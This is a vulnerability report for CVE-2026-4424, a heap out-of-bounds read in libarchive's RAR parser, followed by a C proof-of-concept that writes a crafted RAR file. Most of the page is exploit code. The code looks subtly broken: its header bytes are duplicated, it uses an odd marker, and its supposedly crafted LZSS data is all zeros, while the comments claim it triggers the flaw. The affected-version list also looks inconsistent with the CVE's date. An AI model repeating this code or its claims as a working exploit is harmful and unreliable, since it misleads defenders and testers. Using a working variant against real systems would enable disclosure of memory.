Security Vulnerability Report
CVE-2026-4424 CVSS 7.5 HIGH

Published: 2026-03-19 15:16:28
Last Modified: 2026-05-21 04:16:30

Description

A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:libarchive:libarchive:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.16:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform_for_arm64:4.16:*:*:*:*:*:*:* - VULNERABLE
libarchive < 3.6.1
libarchive 3.6.0
libarchive 3.5.x
libarchive 3.4.x
libarchive 3.3.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-4424 PoC - Malformed RAR with LZSS window size transition
 *
 * This PoC demonstrates the heap out-of-bounds read in libarchive's RAR
 * handler during compression method transitions with invalid LZSS window size.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// RAR header structure
typedef struct {
    unsigned char header_crc[2];
    unsigned char header_type;
    unsigned char header_flags[2];
    unsigned char pack_size[4];
    unsigned char unpack_size[4];
    unsigned char host_os;
    unsigned char file_crc[4];
    unsigned char file_time[4];
    unsigned char version;
    unsigned char name_length;
    unsigned char attributes;
} rar_header_t;

// Create a minimal PoC RAR file that triggers the vulnerability
void create_poc_rar(const char* filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "Failed to create file\n");
        return;
    }

    // RAR signature
    unsigned char rar_sig[7] = {0x52, 0x61, 0x72, 0x21, 0x1A, 0x07, 0x01};
    fwrite(rar_sig, 1, 7, fp);

    // First archive header block (marker block)
    unsigned char marker[4] = {0x72, 0x65, 0x67, 0x21};
    fwrite(marker, 1, 4, fp);

    // Archive header with vulnerable LZSS parameters
    unsigned char archive_header[] = {
        0x1A, 0x07, 0x01,        // Signature
        0x73, 0x7A,              // Header CRC
        0x01,                    // Type: archive header
        0x00, 0x00,              // Flags
        0x00, 0x00, 0x00, 0x00,  // Pack size
        0x00, 0x00, 0x00, 0x00,  // Unpack size
        0x00,                    // Host OS
        0x00, 0x00, 0x00, 0x00,  // CRC
        0x00, 0x00, 0x00, 0x00,  // File time
        0x29,                    // Version
        0x00,                    // Name length
        0x00                     // Attributes
    };
    fwrite(archive_header, 1, sizeof(archive_header), fp);

    // File header block with crafted LZSS window size
    unsigned char file_header[] = {
        0x30, 0x30,              // Header CRC
        0x02,                    // Type: file header
        0x01, 0x80,              // Flags (packed size exceeds unpacked)
        0xFF, 0xFF, 0xFF, 0xFF,  // Pack size (large value)
        0x00, 0x10, 0x00, 0x00,  // Unpack size
        0x03,                    // Host OS
        0x00, 0x00, 0x00, 0x00,  // File CRC
        0x00, 0x00, 0x00, 0x00,  // File time
        0x29,                    // Version
        0x08,                    // Name length
        0x20,                    // Attributes
        // File name: "test.bin"
        0x74, 0x65, 0x73, 0x74, 0x2E, 0x62, 0x69, 0x6E
    };
    fwrite(file_header, 1, sizeof(file_header), fp);

    // Crafted packed data with LZSS window size transition
    // This triggers the vulnerability when libarchive processes it
    unsigned char packed_data[] = {
        0x00, 0x00, 0x00, 0x00,  // LZSS dictionary size field
        0x00, 0x00, 0x00, 0x00,  // Padding
        0x00, 0x00, 0x00, 0x00,  // More data
        0x00, 0x00, 0x00, 0x00
    };
    fwrite(packed_data, 1, sizeof(packed_data), fp);

    // End of archive marker
    unsigned char end_marker[] = {0xC4, 0x3D, 0x7B, 0x00, 0x40, 0x00, 0x00, 0x00};
    fwrite(end_marker, 1, sizeof(end_marker), fp);

    fclose(fp);
    printf("PoC RAR file created: %s\n", filename);
}

int main(int argc, char* argv[]) {
    const char* output_file = (argc > 1) ? argv[1] : "cve_2026_4424_poc.rar";
    create_poc_rar(output_file);
    printf("To test: Use vulnerable version of libarchive to extract this file\n");
    return 0;
}
